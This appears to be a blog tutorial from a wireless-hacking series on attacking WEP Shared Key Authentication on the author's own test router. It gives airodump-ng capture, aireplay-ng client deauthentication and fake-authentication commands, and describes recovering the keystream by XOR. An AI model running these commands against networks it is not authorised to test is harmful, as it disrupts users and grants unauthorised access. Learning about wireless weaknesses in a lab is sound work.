Things are starting to get a bit more interesting now and I hope you are enjoying this series so far as much as I am writing about it.
Shared Key Authentication (SKA) uses a shared secret which you can think of as a password that allows you to connect to and authenticate with the access point from the client.
The exchange of information can be seen in the diagram below:What you see above is the client send an authentication request to the access point which responds back with a challenge. The client then has to encrypt the challenge with the shared key and send it back to the access point which will then decrypt it to check if it can recover the original challenge text. If it is successful the client will then authenticate or else it will send an authentication failed message.
The downfall here is that an attacker can be passively listening to the entire communication while sniffing in the air as both encrypted and plain text unencrypted challenges can be viewed. We can however apply a XOR operation here in order to retrieve the key-stream, this key-stream can then be used to encrypt any future challenge sent by the access point without needing to know the key.
Doing what we have been doing in the previous lessons we are going to put the card into monitor mode and start airodump-ng in order to sniff the air around us and retrieve the challenge, encrypted challenge and the key-stream so that we can then use it to authenticate with the access point without knowing the shared key.
On the router keeping the previous settings but removing the MAC filtering and this time enable WEP with Shared Key Authentication like in the image below:First things first you already have the card in monitor mode don’t you so let’s start up airodump-ng sniffing packets between the access point and the target client but this time we are also going to save them using the “-w” filter to write to a file for later use.
airodump-ng mon0 -c 6 –bssid AP_MAC -w SKA_out
This will start airodump-ng on interface “mon0” set on channel 6 with the access point mac after the “–bssid” and write to a file with the “-w” option, the file is called SKA_out but you can name it whatever you want and you can then use these packets again and analyze them further, you could have done this in the previous lessons too but I didn’t want to hit you with too much at the start.Once you have run airodump-ng you will see the following similar outputNotice under “AUTH” there is currently nothing specified, only two things can exist her “SKA” or “PSK”. We can see however that a client is attached to this access point currently and we can either de-authenticate the client in order to force them to reconnect or wait for a client to connect manually and do the same passively.
Let’s de-authenticate the client in order to speed up this process, it’s always handy to have wireshark open also and be looking to see what may have gone wrong if things aren’t going as expected, it’s a good habit to get into.
aireplay-ng -0 1 -a 00:18:E7:XX:XX:XX -c F4:09:D8:XX:XX:XX mon0
“-0” – means deauthentication
“1” – is the number of deauths to send (feel free to increase this!)
“-a 00:18:E7:XX:XX:XX” – is the MAC address of the access point
“-c F4:09:D8:XX:XX:XX” – is the MAC address of the client you are deauthing
“mon0” – is the interface nameNow if you return to airodump-ng that you left running you should see some changes to your output: Looking above now you see “Broken SKA:” followed by the access point MAC address and “AUTH” has also changed to “SKA” for Shared Key Authentication. You can stop airodump now and look at the packets with wireshark to see what you have obtained.
Running “ls” in your directory you will see the files airodump has created for you:Having a closer look things are unfortunately not as they should be at this stage as a stream should have appeared up where it says “Broken SKA:”. Looking in wireshark though it appears there is an issue here for me anyway which I am not going to dwell on for very long as well there are other ways to get around WEP and I have tried a few cards and different AP’s with the same result, I have also found some tickets for this and it may be a bug in airodump-ng.
Start wireshark on the capture with the following command to load it directly into wireshark for you, handy isn’t it!
wireshark name_of_cap.cap &In wireshark use the following filter to see the exchange take place:
(wlan.addr == 00:18:E7:XX.XX.XX) && (wlan.fc.type_subtype == 0x0b)Let’s break down each packet a bit further to see what is going on here.
Authentication request and 11 bytes of Vendor Specific information is attached.
Packet 2:Challenge text is sent
Packet 3:Packet 3 here is interesting as under the WEP parameters the WEP ICV shows as not verified which is due the the ICV not being encrypted and is just a CRC-32 check that is appended to the end of the frame, based on the encrypted payload, now I have tried spoofing the MAC etc and the only way I seem to be able to get around this is to use a different attack method which you will see soon, the data is the encrypted text.
Packet 4:Rather than focus and obsess on this for too long I am going to move on to further tutorials but if you were to obtain a XOR here you can then replay it with the following command and authenticate without knowing the PSK which was the reason behind this lesson and obtain a fake authentication with the access point.
aireplay-ng -1 0 -e test -y sharedkey.xor -a 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 mon0
“-1” means fake authentication
“0” means only authenticate once
“-e test” is your access point SSID
“-y sharedkey.xor” is the name of file containing the PRGA XOR bits captured by airodump
“-a 00:18:E7:XX:XX:XX” is your access point MAC address
“-h F4:09:D8:XX:XX:XX” is your MAC address on your card
“mon0” is the interface name
Let me know if you have difficulty here also as I have searched myself and can find very little on this subject that leads to an answer anyway, this is quite possibly a bug in airodump but I could be wrong. If you have a similar issue please leave a comment. I may come back to this again in the future but don’t really see the point unless I stumble across this on one of my other routers, for now let’s just move on to the next lesson and crack the WEP key of this access point by trying some alternative methods.
To look at a successful pcap refer to the following download link from the aircrack site, you will see it does not include an additional 11 bytes like mine does above.